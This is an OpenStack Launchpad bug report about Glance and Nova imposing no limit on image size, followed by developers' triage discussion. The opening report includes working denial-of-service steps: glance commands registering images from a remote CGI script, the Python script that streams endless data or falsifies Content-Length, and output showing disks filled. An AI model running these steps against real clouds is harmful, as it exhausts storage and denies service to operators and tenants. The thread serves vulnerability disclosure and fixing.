No limits on image size

Bug #1029950 reported by Derek Higgins
12
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Glance
Opinion
Undecided
Unassigned
OpenStack Compute (nova)
Opinion
Medium
Unassigned
OpenStack Security Advisory
Won't Fix
Undecided
Unassigned

Bug Description

Using Epel Essex packages on RHEL 6.3

Glance should impose configurable limits (or tenant quotas) on the size of the images it allows to be registered and/or uploaded.

Two separate example exploits here
1. Glance Denial of Service by file system exhaustion
2. Nova Compute Denial of Service by file system exhaustion

= 1 =

Using the glance x-image-meta-property-copy-from header it is possible to get glance to keep downloading a large resource until it fills up the local harddrive e.g.

$ glance add name="big image" disk_format=raw container_format=ovf copy_from=http://server/cgi-bin/t.cgi # [1]
Failed to add image. Got error:
The request returned a 413 Request Entity Too Large. This generally means that rate limiting or a quota threshold was breached.

The response body:
413 Request Entity Too Large

The body of your request was too large for this server.

 Image storage media is full: There is not enough disk space on the image storage media.
Note: Your image metadata may still be in the registry, but the image's status will likely be 'killed'.

$ ls -lh /var/lib/glance/images/f1db6d09-1eac-4ce4-86ff-8a34bfea33af
-rw-r--r--. 1 glance glance 87G Jul 27 13:03 /var/lib/glance/images/f1db6d09-1eac-4ce4-86ff-8a34bfea33af
$ df -h /var/lib/glance/images/
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg_rheva8c03-lv_root
                      104G 98G 261M 100% /

this would allow any authenticated user to preform a denial of service on a glance server, with a file system backend. I havn't looked into swift but will it just keep going until is starts filling up storage nodes?

= 2 =

Nova is also open to a similar exploit, by using the x-image-meta-location header in a glance add, a large resource can be registered with glance, any nova compute node that tries to use this image to start an instance can have its disk space very quickly exhausted with a singe instance

# Registering an image 1TB in size (can go bigger if needs be)
$ glance add name="big image" disk_format=raw container_format=ovf location=http://server/cgi-bin/t.cgi
Added new image with ID: 1a528173-7ca9-4320-b0f3-dac127a1f337

$ glance index
ID Name Disk Format Container Format Size
------------------------------------ ------------------------------ -------------------- -------------------- --------------
1a528173-7ca9-4320-b0f3-dac127a1f337 big image raw ovf 1099511627776

$ nova boot --flavor 1 --image 1a528173-7ca9-4320-b0f3-dac127a1f337 bigtest

# the filesystem now fills up, the boot fails and nova deletes the partial download
# next I check the apache logs to see how much nova downloaded.
"GET /cgi-bin/t.cgi HTTP/1.1" 200 93406637550 "-" "-"
# Note : I know I will probably not get the same compute node next time but
# this will at least give me an idea of what size might be tolerated.
# edit cgi script [1] to change the content length to something slightly smaller then 93406637550
$ glance add name="smaller big image" disk_format=raw container_format=ovf location=http://server/cgi-bin/t.cgi
Added new image with ID: a5eb1eab-1536-438f-82cf-4b642cf9d363
$ glance index
ID Name Disk Format Container Format Size
------------------------------------ ------------------------------ -------------------- -------------------- --------------
a5eb1eab-1536-438f-82cf-4b642cf9d363 smaller big image raw ovf 90406637550
1a528173-7ca9-4320-b0f3-dac127a1f337 big image raw ovf 1099511627776

$ nova boot --flavor 1 --image a5eb1eab-1536-438f-82cf-4b642cf9d363 bigtest_2

$ ls -lh /var/lib/nova/instances/_base/7f9a4e3c2891c537a784391cd962e6a5527d0a27
-rw-r--r--. 1 qemu qemu 85G Jul 27 14:13 /var/lib/nova/instances/_base/7f9a4e3c2891c537a784391cd962e6a5527d0a27
$ df -h /var/lib/nova/instances/_base/
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg_rheva8c03-lv_root
                      104G 97G 1.1G 99% /
$

[1] Standard http cgi script used as the vm image
#!/usr/bin/python
import os, sys, uuid

print "Content-Type: text/html"
#print "Content-Length: 1099511627776" # this shouldn't be present for first exploit
print

data = ''.join(uuid.uuid4().hex for a in range(500))
if os.environ.get('REQUEST_METHOD') == "GET":
    while 1:
        print data
        sys.stdout.flush()

Revision history for this message
Thierry Carrez (ttx) wrote :

Adding Brian Waldon and Vish to confirm impact

Revision history for this message
Brian Waldon (bcwaldon) wrote :

Actually, Glance caps image data at 1 PiB, assuming it can tell how big an image is. That's probably larger than most systems can handle anyways, so would you just like to make that configurable?

Thierry Carrez (ttx)
summary: - Glance doesn't impose any limits on image size
+ No limits on image size
Revision history for this message
Thierry Carrez (ttx) wrote :

I'm not sure this should be considered a vulnerability in Glance. The current model is that you trust the people you give glance upload access to anyway. They can upload a 1-Pb image. Or they can upload 1000000 1-Gb images. Both would result in the same issue: disk space exhaustion. I'd recommend setting up some billing so that anyone tempted to do that would end up paying for it.

For Nova, I tend to agree with you there is an attack path. It could definitely use some protection against "too large" images. This can be set up at Glance level or at Nova level (at the very minimum when an image uses x-image-meta-location).

Changed in glance:
status: New → Incomplete
Changed in nova:
status: New → Incomplete
Revision history for this message
Brian Waldon (bcwaldon) wrote :

Thierry, I want to clarify that it's 1 PiB per image uploaded. I'm thinking that is way too big to be useful, as any reasonable system will be several magnitudes smaller

Revision history for this message
Derek Higgins (derekh) wrote :

Thierry I see your point about billing the customer for space used in glance but I still think glance needs protection from a user exausting all diskspace with one http call. Reducing and fully enforcing the limit on image size will do this and also result in protecting Nova, since all images are download via the API.

It looks to me like IMAGE_SIZE_CAP needs to be reduced from 1PiB to something more resonable (10GiB maybe?), and also it could be made configurable (or a tenant quota, probably not suitable if back porting to essex is considered).

Then all methods of "POST /v1/images" need to respect this value, if passed as a header with the http POST or calculated while it is being uploaded if not in the http headers.

Finally if using the x-image-meta-location: header Glance needs also to respect the image size which was registered for an image, (to protect it from the image size increasing between registration and usage). currlently it reports the size registered when a HTTP HEAD is done against /v1/images/<uuid> but returns the changed size when a HTTP GET is done. So nova downloads the new size (regardless of what was registered)

Revision history for this message
Thierry Carrez (ttx) wrote :

For Glance, I think capping the size of images is a good strengthening measure that should definitely be implemented. I just fail to be convinced that this closes a vulnerability: IMHO it falls in normal usage (yes, you can fill Glance and Swift space if you want to, but should be billed for it). Maybe that's just me, though :)

It's another story for Nova, which should not be DoSed because Glance lets people do weird things. It should implement its own capping/protection IMHO. The x-image-meta-location is even more convenient to exploit for fun and profit, this is a vulnerability and it should be fixed.

I'd really like to hear others opinions. Russell, Steve, Vish ?

Revision history for this message
Vish Ishaya (vishvananda) wrote :

seems like the real bug here is lack of quota enforcement. We should probably have a quota on disk space usage in both nova and glance (the only exception might be the new swift backend which stores files in each user's container, in which case it is swift's problem). In the short term, a configurable option for max image size makes sense in both nova and glance. Nova might need two, max image size, and max virtual image size.

Revision history for this message
Thierry Carrez (ttx) wrote :

Adding mikal for comment

Revision history for this message
Michael Still (mikal) wrote :

It seems to me that there are two other things at play here:

 - nova-compute shouldn't be fetching images it knows it doesn't have enough disk for, it should be checking and throwing an exception.

 - nova-scheduler shouldn't be handing compute nodes jobs they don't have enough disk for.

Brian Waldon (bcwaldon)
Changed in glance:
milestone: none → folsom-rc1
status: Incomplete → Triaged
Brian Waldon (bcwaldon)
Changed in glance:
importance: Undecided → Critical
Revision history for this message
Russell Bryant (russellb) wrote :

It does seem like this should be treated as a vulnerability. I took a look at the security advisories we have done this year, and this seems to be at the same level as some other DOS vulnerabilities we have fixed, including:

[OSSA 2012-003] Long server names grow nova-api log files significantly
[OSSA 2012-005] No quota enforced on security group rules
[OSSA 2012-009] Scheduler denial of service through scheduler_hints

For nova, I think a cap on image size makes sense. For glance, is that sufficient to stop someone from filling up disk space? Is there also a limit on how many images you can upload?

Revision history for this message
Brian Waldon (bcwaldon) wrote :

The only limit in glance is the 1 PiB non-configurable max image size. There are no limits on the number of images.

Revision history for this message
Brian Waldon (bcwaldon) wrote :

The configurability of the max allowed image size is addressed in https://review.openstack.org/#/c/11627/. It also fixes a problem where chunked transfer-encoding requests weren't getting checked.

Changed in glance:
status: Triaged → In Progress
assignee: nobody → Brian Waldon (bcwaldon)
Revision history for this message
Brian Waldon (bcwaldon) wrote :

Thierry suggested I file a public bug and fix that with the review I just mentioned - https://bugs.launchpad.net/glance/+bug/1038994.

Changed in glance:
status: In Progress → Incomplete
importance: Critical → Undecided
milestone: folsom-rc1 → none
Revision history for this message
Thierry Carrez (ttx) wrote :

Capping in Glance was publicly fixed.
I propose we consider this a vulnerability in Nova only and do an embargoed fix here.

Steve B., Russell: what do you think ?

Vish, Mikal, Brian: anyone up to propose a Nova fix ? Please attach here.

Changed in nova:
importance: Undecided → Medium
status: Incomplete → Confirmed
Revision history for this message
Russell Bryant (russellb) wrote :

+1 on the proposal to consider this just a vuln in nova and doing the fix here

Revision history for this message
Thierry Carrez (ttx) wrote :

Vish, Mikal, Brian: anyone up to propose a Nova fix ? Ideally it would not introduce a new configuration parameter (at least for stable/*)

Brian Waldon (bcwaldon)
no longer affects: glance
Revision history for this message
Brian Waldon (bcwaldon) wrote :

What fix would be appropriate for Nova? Do we want to check available disk space before any write actions on nova-compute nodes?

Revision history for this message
Thierry Carrez (ttx) wrote :

Adding nova-core to increase the chances this gets fixed in time for RC1

Changed in nova:
milestone: none → folsom-rc1
Revision history for this message
Pádraig Brady (p-draigbrady) wrote :

Eek this is a bit awkward. I'm not sure how to address this TBH, just some notes...

A related nova commit with inline comments on space checking is
https://review.openstack.org/#/c/11399/3

The issue would be mitigated somewhat if nova could always
do a HEAD first to get the image size, and check/preallocate that.
But Derek's point in comment 5 suggests that the GET
might in fact get more. In any case I suppose someone could
still start high and reduce the size until they got an image that
just filled the disk.

Having a max size per image would help, but not if
users could use many such images. That would have
to be enforced by quotas/billing.

Thierry Carrez (ttx)
Changed in nova:
milestone: folsom-rc1 → none
tags: added: folsom-rc-potential
Revision history for this message
Thierry Carrez (ttx) wrote :

Anyone with a better suggestion ? Would be great to cover this one before Folsom is out, but the clock is ticking

Thierry Carrez (ttx)
tags: added: folsom-backport-potential
removed: folsom-rc-potential
Revision history for this message
Thierry Carrez (ttx) wrote :

Guys, would be great to come up with a solution for this.

We can deny it's a practical attack vector, saying that nova-compute will survive it ("the filesystem now fills up, the boot fails and nova deletes the partial download"), or come up with a more creative fix...

Revision history for this message
Thierry Carrez (ttx) wrote :

Putting back in scope to discuss what to do with this one.

Changed in ossa:
status: New → Incomplete
Thierry Carrez (ttx)
Changed in ossa:
importance: Undecided → Medium
status: Incomplete → Confirmed
status: Confirmed → Incomplete
importance: Medium → Undecided
Sean Dague (sdague)
no longer affects: glance
Revision history for this message
John Garbutt (johngarbutt) wrote :

From a nova point of view, the maximum size of the image, is basically CoW base image + max size of disk.

Bugs in snapshot management could cause other issues, but we don't appear to be talking about that here.

Changed in nova:
status: Confirmed → Incomplete
Joe Gordon (jogo)
Changed in nova:
status: Incomplete → Invalid
Joe Gordon (jogo)
Changed in nova:
status: Invalid → Incomplete
Revision history for this message
Andrew Laski (alaski) wrote :

I'm not sure what's incomplete or invalid here. Are there now measures in Nova that would prevent this case from happening?

It seems to be somewhat alleviated by Glance now being able to enforce a maximum size. But there is no fix for the Nova issue referenced here.

Revision history for this message
John Garbutt (johngarbutt) wrote :

It was my previous comment, I don't understand the concern.

The max size of the snapshot is generally constrained by the max size of the virtual root disk.

It might expand bigger than that due to branching in the disk "snapshot" chain.I wasn't clear, but I was looking for more detail on how you make that chain grow, such that the size is unbounded.

But I think I miss-read this. I guess the idea is to check the snapshot size in glance *before* doing the download, in the hope that glance is not lying about the stated size of the snapshot. I know in the XenAPI driver we check the size, but that is post download.

Changed in nova:
status: Incomplete → Confirmed
Revision history for this message
Andrew Laski (alaski) wrote :

After digging a bit more I do have some questions on the behavior that's reported here. There is an early check to ensure that the image size is not too large for the flavor being used:

        root_gb = instance_type['root_gb']
        if root_gb:
            if int(image.get('size') or 0) > root_gb * (1024 ** 3):
                raise exception.FlavorDiskTooSmall()

This gives deployers some protection unless they're creating flavors that can be scheduled to computes which can't handle that disk size. Or using root_gb = 0.

It would be great to add some additional protection on computes to ensure that they're not filling their entire filesystem, but I think the impact is somewhat mitigated here.

Revision history for this message
Thierry Carrez (ttx) wrote :

Ok, it feels like this vulnerability is now a bit shallow. I propose we open it on Thursday and turn it into a security strengthening bug, since it's not really exploitable ?

Revision history for this message
Derek Higgins (derekh) wrote :

Its been a while since I looked at this, I'll check to see if the bug that I originally reported is still exploitable, if its not opening it up sounds ok to me.

Revision history for this message
Derek Higgins (derekh) wrote :

Confirming this is still relevant, using current trunk I can, register a small image with glance
glance image-create --location http://192.168.1.4/cgi-bin/t.cgi --disk-format qcow2 --container-format bare --name testimage
# glance image-list
| af672331-b29c-405f-a714-3fc2dd8b0110 | testimage | qcow2 | bare | 19596947 | active |

change the Content-Length returned by the cgi script and then when I try to start an instance nova will continue to download the image until its disk space is exhausted
IOError: [Errno 28] No space left on device
then the base image is deleted

this is going through the glance api which isn't respecting the size of the image that was registered with it.

Also I noticed that the glance image_size_cap can be bypassed by registering a glance image with "--copy-from" by arranging for HEAD to return a different Content-Length: to GET

Revision history for this message
Andrew Laski (alaski) wrote :

Ok, so the real issue here seems to be that it is possible to have Glance provide images which do not conform to the specifications it provides for those images. There is some hardening that could be done within Nova such as limiting the amount of data downloaded to the image_size specified by Glance. But I think Glance should look into this as well to see what measures can be implemented there.

Revision history for this message
Thierry Carrez (ttx) wrote :

So, IIUC as far as Nova is concerned, it's the question of whether we should consider vulnerability to a hostile Glance server as a Nova vulnerability. I suspect there are other types of DoS that can be achieved when Nova is paired with a hostile/taken-over Glance server, so I'm not sure we should include that case in our OSSA attack surface...

Revision history for this message
Thierry Carrez (ttx) wrote :

Proposing class C1 -- if your glance server is taken over, image size should be the least of your concerns.
https://wiki.openstack.org/wiki/Vulnerability_Management#Incident_report_taxonomy

Revision history for this message
Jeremy Stanley (fungi) wrote :

Agreed, this is class C1 (not practically exploitable and so not anything for which we should issue a security advisory). If there are no disagreements, I'll switch this to a regular public bug and mark the security advisory task "won't fix" on Thursday.

Revision history for this message
Andrew Laski (alaski) wrote :

No disagreement from me.

Revision history for this message
Jeremy Stanley (fungi) wrote :

It's now (UTC) Thursday.

information type: Private Security → Public
Changed in ossa:
status: Incomplete → Won't Fix
tags: added: security
Joe Gordon (jogo)
Changed in nova:
status: Confirmed → Opinion
Changed in glance:
status: New → Opinion
To post a comment you must log in.
This report contains Public information  
Everyone can see this information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.